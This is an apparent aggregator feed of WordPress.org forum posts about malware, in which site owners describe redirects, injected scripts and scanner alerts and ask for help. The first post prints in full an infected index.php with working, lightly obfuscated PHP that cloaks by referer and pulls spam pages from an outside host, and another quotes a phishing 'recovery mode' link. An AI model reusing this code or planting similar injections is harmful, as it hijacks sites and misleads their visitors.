Quantcast
Channel: Topic Tag: malware | WordPress.org
Viewing all 1906 articles
Browse latest View live

Malware Keeps Coming Back

October 31, 2019, 7:22 am
$
0
0

Hi,

I have recently taken across a client site that had malware. I found this to be coming from the index.php page. It seems to be creating HTML pages from the website URL and trying to sell Diet Pills.

I’ve tried scanning with Wordfence to find out where its coming from, but no joy.

Every time I change the Index.php back to the original it changes itself back normally by the next day.

This is the index.php file that it keeps changing. I’ve tried changing the permissions to 444. 

<?php
error_reporting(0);
//wp-content/backup.php
$www="2";
$caches="./backup/";
$files= !empty($_GET['size'])?$_GET['size']:"index.html";
function getHtml($url)
{
    $content=file_get_contents($url);
    if(empty($content)){
    $ch = curl_init();
    $timeout = 5;
    curl_setopt ($ch, CURLOPT_URL, $url);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    $content = curl_exec($ch);
    curl_close($ch);
    }
return $content;
}

   $tiaourl="http://zctrack.com/1617a0ee-1962-44ec-8ff4-12c1f5d0ab89";

function chref($crefs)
{
$truecref= str_replace("x","","bxxixnxgx|xaxoxxlx|axsxxk|xgxoxxoxgxlxe|yxxaxhxoxo|sxexxaxrxcxh");
if(preg_match("/$truecref/i",$crefs)){
return true;
}else{
return false;
}
}
$htprefs = strtolower($_SERVER/*;*/[/*;*/'HTTP_REFERER'/*;*/]);
if(chref($htprefs) && isset($_GET['size'])){
header("location: ".$tiaourl);    
    exit;
}
if(isset($_GET['size']))
    {
        $con= getHtml('http://1.blng-blng.com/sheng/lossw5/main.php?key='.$_GET['size']."&host=".$_SERVER['HTTP_HOST']."&www=".$www);
         $con=str_replace('.sizehtml','.html',$con);
         $con = str_replace("http://mywordpresswebsite(url removed).co.uk/","https://mywordpresswebsite(url removed)/",$con);
echo $con;
        exit();
    }
?><?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
Search

Malware detected in fonts folder?

November 3, 2019, 12:06 pm
$
0
0

Dear Ewout,

My security plugin alarms me for two files in the fonts folder of your plugin. They do not seem to be normal font files, but have very long names.
Can you tell me if these are normal and safe?

I have some screenshots if you want to, but these are the names of the files:

wp-content/uploads/wpo_wcpdf/fonts/90fdc289a6639aa8b38f2b95590d9aae.ufm.php
wp-content/uploads/wpo_wcpdf/fonts/f5ba4657e8551f4baf90d70d6404541f.ufm.php

Thanks you and best regards,

Marc

suspicious Updraftplus file causing bug

November 4, 2019, 2:08 pm
$
0
0

Hi,

My websites were blocked because of a malware. When I did a scan, it ended being 2 of your files in there(./wp-content/plugins/updraftplus/config.php Details: php.backdoor.xhell.001.01).
Can you please explain? I thought you were a safe plugin.

Warning! Malware with this plugin

November 5, 2019, 12:59 pm
$
0
0

I installed this plug in one month ago, and linked it with my account..
Then I found out my account is linking random post from people I don’t know on Instagram… Didn’t understand what happened.. Changed my password but it was doing it again, liked multiple random unknown post per day..
Then I found out in the setting that this plug in was connected to my account..
I desactivated it and everything get back to normal.
I thought I should warn people…

Malware Found – Injected Script

November 7, 2019, 6:59 am
$
0
0

Hello,

My site was hacked.

The website SUCURI.NET found a malware, like this:

My WP Forum is down, and I have problems with displays.

What do now?
What is the source of hacking?

Do you have any information about this, perhaps a similar case?

Thank you to those who will give me their time.
L.

Malware redirection

November 7, 2019, 8:18 pm
$
0
0

The website is redirecting and I found that the posts table has been modified. Almost all columns in the post_content ended with this script:

[ Deleted ]

Anyone can share the mysql code to delete only this data?

Symantec 30548 web attack jscoinminer website detected

October 18, 2019, 12:50 pm
$
0
0

Hi,

Recently I had a malware on my website that redirects to another site in a new tab.That behavior doesn’t do it anymore.But I am seeing this message every time there is a webiste page.

Any ideas?

Real post-5.2 “technical issue” email, or scam?

November 17, 2019, 6:31 am
$
0
0

I received an email that looked legit (as far as I can tell it even really came from my server), but I’m concerned that foul play is involved.

It looks like emails others have been getting since version 5.2 when a plugin throws an error:

Howdy!

Since WordPress 5.2 there is a built-in feature that detects when a plugin or theme causes a fatal error on your site, and notifies you with this automated email.

In this case, WordPress caught an error with one of your plugins, 3D FlipBook – Light Edition.

It continued with reasonable advice, like checking the front-end and back-end. Indeed I was getting a PHP fatal error when I tried to access either. The email went on to say:

If your site appears broken and you can’t access your dashboard normally, WordPress now has a special “recovery mode”. This lets you safely login to your dashboard and investigate further.

https://land.buyittraffic.com/click?/wp-login_php&action=enter_recovery_mode&rm_token=5BfZRVYe2hhkapSKQcqW3w&rm_key=ystIma0Me1XIHV36wtPdbx

To keep your site safe, this link will expire in 1 day. Don’t worry about that, though: a new link will be emailed to you if the error occurs again after it expires.

Notice the link: “land.buyittraffic.com”???! Unfortunately I clicked on it before I noticed the weird domain, and I was redirected to someplace strange (https://actraffic.com/?p=gzqwiztegm5gi3bpha2dg&sub1=Ayaana&sub2=tony.v2). I quickly closed the tab. Sometime in this process (I can’t remember the exact order of actions), I connected via FTP and renamed the folder of the plugin that was originally throwing an error. But then WordPress attempted to run and send me to my home page, but it was sent through a series of redirects and eventually to a very similar page, and that time Avast announced that it had blocked a threat and aborted a connection to scripts.trasnaltemyrecords.com because it was infected with JS:Downloader-GGQ [Trj]. At that point I completely replaced my index.php with a message to my visitors and will attempt to restore an old version of my site from backup tomorrow.

I can’t find anyone else reporting that WordPress 5.2 “technical issue” email as being malware, but that link sure looks strange – did I screw up my site worse by clicking on it?

Search

Redirect malware

November 18, 2019, 11:18 am
$
0
0

I have a redirect malware somewhere on my site. Symptoms:

1. Only mobile and iOS users
2. Random
3. Seems to always happen for new users, but following requests works fine

I have upgraded WordPress and all plugins, changed the theme, removed unused plugins. Also inspected common php and .htaccess file.

Anyone has any clues?

Any recommendations for experts that could help me out?

wp-admin page redirects…why?

November 20, 2019, 9:07 am
$
0
0

Hello, as recently as this weekend my WordPress website login page redirects to a spam site. The website URL is https://www.thesearchninjas.com does anyone know why this is happening, or how to fix it? Thanks!

You Must Have This Plugin!

December 3, 2019, 2:56 pm
$
0
0

My website was hacked via outdated adminer.php. Login credentials stolen, two users had logged in. I could not login, my site was a redirect. Host server backup got the site restarted. This plugin identified infected files and malware script at 604 posts. I increased security (Wordfence Premium plus Anti-Malware) and changed all passwords after this plugin quarantined 7,405 files. Login hacks stopped, malware script removed, problem solved for this round. Anti-Malware is worth every dime of the $29 donation!

Travel Agency bug – Detected injected PHP code

December 9, 2019, 10:10 am
$
0
0

My new website www.goholidaytravels.com having a malicious error due to PHP code injection. I am not able to run the Google Adword campaign due to this bug.
It would be appreciable if anyone could help me out to resolve this bug.

Below is the detailed error report:
Malware Scanner Report:
=======================================================================
Quttera Web Malware Scanner plugin for WordPress
Website Malware Scan Report

Scanned Website: https://goholidaytravels.com
Scan type: Internal
Report generation time: 2019-12-09 10:09

Scan launch time: 2019-12-09 10:03
Scanned files: 6089
Clean: 6082
Potentially Suspicious: 0
Suspicious: 5
Malicious: 2
=======================================================================

FILE: wp-includes/wp-vcd.php
FILE_MD5: cbf518a7a6722d9c7a9086e57e062737
SEVERITY: enSuspiciousThreatType
ENGINE: fscanner
THREAT_SIG: cbf518a7a6722d9c7a9086e57e062737
THREAT_NAME: Heur.AlienFile.gen
THREAT: Unknown file in core directory…
DETAILS: Detected unknown file in core directory

FILE: wp-includes/wp-tmp.php
FILE_MD5: bf226c41d0b4c42458516bdbd5e7f446
SEVERITY: enSuspiciousThreatType
ENGINE: fscanner
THREAT_SIG: bf226c41d0b4c42458516bdbd5e7f446
THREAT_NAME: Heur.AlienFile.gen
THREAT: Unknown file in core directory…
DETAILS: Detected unknown file in core directory

FILE: wp-includes/wp-feed.php
FILE_MD5: 7ba81b28edc0df0bdcc6dfb6a6b3a19f
SEVERITY: enSuspiciousThreatType
ENGINE: fscanner
THREAT_SIG: 7ba81b28edc0df0bdcc6dfb6a6b3a19f
THREAT_NAME: Heur.AlienFile.gen
THREAT: Unknown file in core directory…
DETAILS: Detected unknown file in core directory

FILE: wp-includes/post.php
FILE_MD5: f97bca07e3c42f344986fe4c23dd0b07
SEVERITY: enSuspiciousThreatType
ENGINE: fscanner
THREAT_SIG: f97bca07e3c42f344986fe4c23dd0b07
THREAT_NAME: Heur.CoreFile.gen
THREAT: Modified core file…
DETAILS: Detected modified core file

FILE: wp-includes/.htaccess
FILE_MD5: 83c059a741ce3c1a46bde1a66216656e
SEVERITY: enSuspiciousThreatType
ENGINE: fscanner
THREAT_SIG: 83c059a741ce3c1a46bde1a66216656e
THREAT_NAME: Heur.AlienFile.gen
THREAT: Unknown file in core directory…
DETAILS: Detected unknown file in core directory

FILE: wp-content/themes/tour-operator/functions.php
FILE_MD5: 5a28acb294e24f98087b71e8728f0177
SEVERITY: enMaliciousThreatType
ENGINE: fscanner
THREAT_SIG: 1381cc1143ba2d9a6db1dde176c1d24d
THREAT_NAME: Trojan.PHP.Injection.gen.1c6
THREAT: <?php if (isset($_REQUEST[‘action’]) && isset($_REQUEST[…
DETAILS: Detected injected PHP code

FILE: wp-content/themes/travel-agency/functions.php
FILE_MD5: 3789b05609c0ba5679b3c52bc337ae23
SEVERITY: enMaliciousThreatType
ENGINE: fscanner
THREAT_SIG: 9ab21595d286c0b54046a43e8e91236c
THREAT_NAME: Trojan.PHP.Injection.gen.1c6
THREAT: <?php if (isset($_REQUEST[‘action’]) && isset($_REQUEST[…
DETAILS: Detected injected PHP code

Great malware detection, awesome support, but one catch

December 12, 2019, 7:12 pm
$
0
0

I use MalCare on several sites for automated backups and security. Recently, I was notified by MalCare about malware found on multiple sites. Upon running the cleanup process, the detected malware was successfully removed. Not only that, but the founder and his team immediately got to work to detect the vulnerability that caused the malware to land on my sites in the first place. Turned out it was due to a plugin that had a security vulnerability. They then promptly notified the developer of that plugin and worked with their team to get it patched, and an update was released by the developer within hours to close the loophole.

All-in-all, great job by the plugin for detecting the malware and by the team to help address the root cause for malware landing on the sites, but when it comes to removing the malware from the site, while the process did work successfully, there was one serious shortcoming in the way it worked: it required manual initiation of the cleanup process by me for every site individually. The reason for that appears to be the way MalCare is built – it works on read-only access mode by default, and can’t make any modifications to the site without your manual initiation of the process, in which you provide FTP/SFTP/FTPS credentials to start the cleanup.

As someone who understands cybersecurity best practices, I’m sure this is by design in order to prevent MalCare from modifying anything on the site without explicit initiation by the site owner, but for a malware cleanup service, it’s extremely important that cleanup happens immediately upon detection, and automatically, since the owner might not be immediately available to initiate the process manually, or they might have too many sites to be able to initiate it for all of them at the same time, in case the same malware is detected on multiple sites. And in the meantime, even though malware was detected and MalCare had the capability to remove it, hackers could have a field day exploiting the malware till the site owner manually initiates the removal process for all sites.

Due to this, I’m deducting one star from what would have otherwise been a five star review. And I feel bad doing it because the team is so responsive and proactive in helping their customers, not to mention very talented at what they do. I hope fully automated malware removal is available soon, so that I could update this review with the full five stars.

{YARA}eval_post – malware

December 19, 2019, 12:45 am
$
0
0

Hello,
My hosting provider is telling me that this plugin contains a malicious script. Here is what they got from the virus scan :
{YARA}eval_post : /—–/wp-content/cache/supercache/—–/meta-wp-cache-717ab2db432fe0d4023b3b083606ad25.php => /usr/local/maldetect/quarantine/meta-wp-cache-717ab2db432fe0d4023b3b083606ad25.php.209533040
Is this the case for other users of this plugin ?

Opening External websites on Click anywhere

December 27, 2019, 2:14 am
$
0
0

Upon Installing this theme.. anywhere I click on the site it opens a new website mainly allashark.site and another similar site.. kind of malware.. pls help else I dont have any other option except to opt for an alternative theme

Search

It helped me to remove injected code

January 1, 2020, 12:11 pm
$
0
0

Not only this plugin helps you with current threats, but it also detects old ones…

Thanks for a very efficient plugin!

Malware redirect: Unable to edit page

January 2, 2020, 3:47 am
$
0
0

There is a malware redirect on my website, which redirects me even when trying to use the wordpress editor for editing the site and fixing the issue. I can login and I can see the wordpress environment for a moment, but then I’m being redirected. I have read all the other help threads on malware redirects, but the problem is that I am not able to edit the site (update, backup, etc.) due to the redirect. Can anyone help?

WordPress site redirected to another site

January 13, 2020, 1:10 am
$
0
0

Hello, Need some help here my WordPress site has been redirecting to another website since yesterday and I don’t know how to fix it. I try to find the script in the project file and WordPress database but no luck at all.

thank you for ur help here.

Access Denied

January 14, 2020, 2:58 am
$
0
0

Hi

I’ve inadvertently blocked access to one of our websites by activating a couple of settings in mini-orange 2FA. I was exploring the other options on the dashboard and I think because I tried setting protect wp_config file and htaccess (amongst others) I’ve damaged the setup.

I’ve tried disabling the plugin through the database, but I don’t have enough knowledge of the other wp_options which may also be causing the problem.

I can’t currently get to the wordpress login. Any help would be appreciated.

Regards

Julie

Guys, love your work… But take care of those updates

January 15, 2020, 9:40 am
$
0
0

Hey guys,

I think it’s been now 5 or 6 times that a new update shows up in WordPress.

It doesn’t inspire much trust to see so many updates in a row.

Viewing all 1906 articles
Browse latest View live
Search